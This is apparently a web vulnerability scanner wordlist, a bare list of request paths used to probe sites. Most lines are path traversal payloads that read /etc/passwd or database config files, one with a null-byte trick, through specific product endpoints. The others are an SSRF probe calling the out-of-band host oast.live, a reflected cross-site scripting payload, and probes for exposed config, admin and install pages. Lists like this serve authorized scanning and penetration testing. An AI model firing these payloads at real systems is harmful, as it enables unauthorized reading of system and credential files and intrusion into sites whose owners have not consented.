/index.php?download=/etc/passwd
/index.php?page_slug=../../../../../etc/passwd%00
/cmscp/ext/collect/fetch_url.do?url=https://oast.live
/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime
/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime
/config.php
/config/config.php
/include/config.php
/includes/config.php
/v12/setup/temp/admin.php
/downlot.php?file=../../../../../../../../../../etc/passwd
/ccm/system/panels/page/preview_as_user/preview?cID=
/cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName
/install/
/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
